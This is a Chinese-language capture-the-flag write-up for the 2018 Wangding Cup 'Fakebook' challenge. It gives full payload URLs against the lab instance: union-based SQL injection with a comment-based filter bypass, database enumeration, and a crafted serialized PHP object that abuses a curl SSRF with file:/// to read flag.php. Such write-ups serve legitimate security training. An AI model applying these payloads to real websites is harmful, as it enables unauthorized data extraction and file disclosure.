网鼎杯 2018 Fakebook 1题解
前置知识
均可看之前的博客
union联合注入
源码泄露
php伪协议
做题详解
首先随便注册一个用户访问,点击username进入到/view.php?no=1的界面,尝试单引号闭合,发现报错,猜测存在sql注入。发现,当no=1时,无论怎么注入,都会显示到初始界面。于是将no的值改为2。
尝试union联合查询,构造payload:
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20order%20by%204#
回显正常,构造payload
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union%20select%201,2,3,4
回显:no hack ~_~
猜测过滤了union select,用注释绕过
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,2,3,4
发现2是回显位,同时age一栏有回显/var/www/html/view.php,构造payload注数据库名
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,database(),3,4
回显:fakebook
构造payload注表名
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema='fakebook'
回显:users
构造payload注列名
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name='users'
回显:no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
构造payload注数据
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,(select%20group_concat(concat(data))),3,4%20from%20fakebook.users
回显:O:8:"UserInfo":3:{s:4:"name";s:2:"kb";s:3:"age";i:1;s:4:"blog";s:27:"https://kingofkb.github.io/";}
得到了一串序列化得到的数据。
访问/robots.txt,发现/user.php.bak,访问得到
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
其中有一个get方法。主要的工作是建立会话,然后判断是否是有效的请求,如果不是则返回404,如果不是则返回url的内容,get方法中,curl_exec()如果使用不当就会导致ssrf漏洞。
看到大佬博客说扫目录可以扫到flag.php(自己做的时候没有扫到)
可以用伪协议file://var/www/html/flag.php访问。
最后构造payload(注意同时要改s的长度)
http://fdcb238d-7970-46d5-ac9f-c93d98707d3c.node4.buuoj.cn:81/view.php?no=2%20union/**/select%201,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
至于O:8:”UserInfo”:3:{s:4:”name”;s:5:”admin”;s:3:”age”;i:19;s:4:”blog”;s:29:”file:///var/www/html/flag.php”;}的注入位是一个一个试出来的,最后f12找到
?php
$flag = "flag{74572b3f-2766-47bc-88c8-5ce6f094f25a}";
exit(0);
得到flag:flag{74572b3f-2766-47bc-88c8-5ce6f094f25a}
参考:
https://blog.csdn.net/weixin_45642610/article/details/112807706
https://blog.csdn.net/bazzza/article/details/111412288
https://www.cnblogs.com/junlebao/p/14104036.html
